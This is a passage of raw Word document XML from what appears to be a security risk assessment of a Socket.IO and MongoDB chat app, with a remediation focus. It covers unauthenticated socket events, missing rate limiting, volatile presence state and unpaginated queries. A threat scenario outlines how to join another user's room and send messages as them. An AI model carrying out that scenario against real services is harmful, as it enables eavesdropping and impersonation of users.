        </w:rPr>
        <w:t>This would allow the attacker to: - Join the victim's private Socket.IO room - Receive all real-time messages intended for the victim - Appear as "online" under the victim's identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability B — No Rate Limiting on Socket Events:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">There is no mechanism to throttle or rate-limit socket event emissions. A malicious client could: - Emit thousands of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>typing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events per second, flooding all connected clients - Emit rapid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>new message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events, creating a denial-of-service condition - Emit repeated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mark messages read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events, generating unnecessary database writes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Threat Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Attacker opens a raw WebSocket connection to the server. 2. Attacker emits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with another user's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which may be guessable or obtained through the search API). 3. Attacker now receives all real-time messages sent to that user. 4. Attacker emits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>new message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events with the victim's identity, sending messages on their behalf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- The Socket.IO server requires a valid connection to be established (TCP handshake), providing transport-level filtering. - REST API endpoints that persist data (send message, mark read) require valid JWT tokens, so permanent data mutations are still authenticated. - The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler checks for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>userData._id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> presence but not its validity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5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Add Socket.IO authentication middleware to verify JWT on connection</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Critical</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Validate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>userData._id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> against the JWT-decoded user identity</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Critical</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per-socket event rate limiting (e.g., max 10 events/second)</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Add socket-level authorization checks for room-specific events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r>
    </w:tbl>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Recommended Socket.IO authentication middleware:</w:t>
        <w:br/>
        <w:t>io.use(async (socket, next) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const token = socket.handshake.auth.token;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!token) return next(new Error("Authentication required"));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        const decoded = jwt.verify(token, process.env.JWT_SECRET);</w:t>
        <w:br/>
        <w:t xml:space="preserve">        socket.userId = decoded.id;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        next();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch (err) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        next(new Error("Invalid token"));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Risk Area 3: In-Memory State Volatility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟡 MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The system's real-time presence tracking relies entirely on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>volatile in-memory data structures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are lost upon server restart, crash, or deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Evidence</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 lines 81-83:</w:t>
        <w:br/>
        <w:t>const onlineUsers = new Map();      // Lost on server restart</w:t>
        <w:br/>
        <w:t>const socketToUser = new Map();     // Lost on server restart</w:t>
        <w:br/>
        <w:t>const socketAwayMap = new Map();    // Lost on server restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These three Map objects constitute the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>single source of truth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for: - Which users are currently online - Which socket connections belong to which users - Which tabs/sockets are in an "away" state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Threat Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Server crashes due to an unhandled exception or is restarted for deployment. 2. All three Maps are instantiated as empty objects. 3. All currently connected users are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>immediately considered offline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the server, even though their browser tabs remain open. 4. Status change broadcasts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user status change: offline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the server has no record of the previous connections. 5. Other users see stale presence data until the affected users refresh their pages and trigger new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events. 6. The database retains the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>last known status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from before the crash, which may be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>away</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, creating an inconsistency between database and server state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Impact Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Severity</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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Data Loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None (messages are persisted in MongoDB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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User Experience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Degraded (stale presence, phantom "online" users)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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recovery Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Automatic (users reconnect on next page interaction)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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 (server crashes are infrequent in development)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- Socket.IO clients automatically attempt to reconnect when a connection is lost, which triggers a new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> event and repopulates the presence registry. - The database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field is updated asynchronously, providing a fallback for presence queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.6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Migrate presence data to Redis with TTL-based auto-expiry</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Implement graceful shutdown handler to broadcast </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>offline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> for all users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Add client-side reconnection logic that re-emits </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> on reconnect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Implement periodic presence heartbeat to detect and clean stale entries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r>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Risk Area 4: Data Integrity &amp; Consistency Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟡 MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Several critical data integrity invariants are enforced at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>database schema level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, making them vulnerable to bypass through direct database manipulation, bugs, or incomplete error handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability A — `readBy ⊆ deliveredTo` Invariant Not Schema-Enforced:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The system design specifies that a message can only be in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>readBy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> set if it is also in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deliveredTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> set (a message cannot be read before being delivered). However, this invariant is enforced only through application logic:</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messageControllers.js — Application-level enforcement:</w:t>
        <w:br/>
        <w:t>$addToSet: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    readBy: userId,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    deliveredTo: userId,    // Always updated together</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The MongoDB schema itself has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>no constraint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> preventing a direct database operation from adding a userId to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>readBy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without also adding it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deliveredTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</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messageModel.js — No cross-field validation:</w:t>
        <w:br/>
        <w:t>deliveredTo: [{ type: mongoose.Schema.Types.ObjectId, ref: "User" }],</w:t>
        <w:br/>
        <w:t>readBy: [{ type: mongoose.Schema.Types.ObjectId, ref: "User" }],</w:t>
        <w:br/>
        <w:t>// No schema-level validator ensures readBy ⊆ deliveredTo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability B — No Message Pagination:</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messageControllers.js, lines 11-17:</w:t>
        <w:br/>
        <w:t>const messages = await Message.find({</w:t>
        <w:br/>
        <w:t xml:space="preserve">    chat: req.params.chatId,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    deletedFor: { $ne: req.user._id },</w:t>
        <w:br/>
        <w:t>})</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .populate("sender", "name pic username")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .populate("chat");</w:t>
        <w:br/>
        <w:t>res.json(messages);   // Returns ALL messages — no limit, no pagination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This query returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a chat without any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>skip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. For a group chat with 100,000 messages, this results in: - Extremely large MongoDB query result sets consuming server memory - Multi-megabyte JSON response payloads transmitted over the network - Browser UI freezing or crashing when rendering tens of thousands of DOM elements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability C — `latestMessage` Reference Staleness:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Chat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model maintains a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
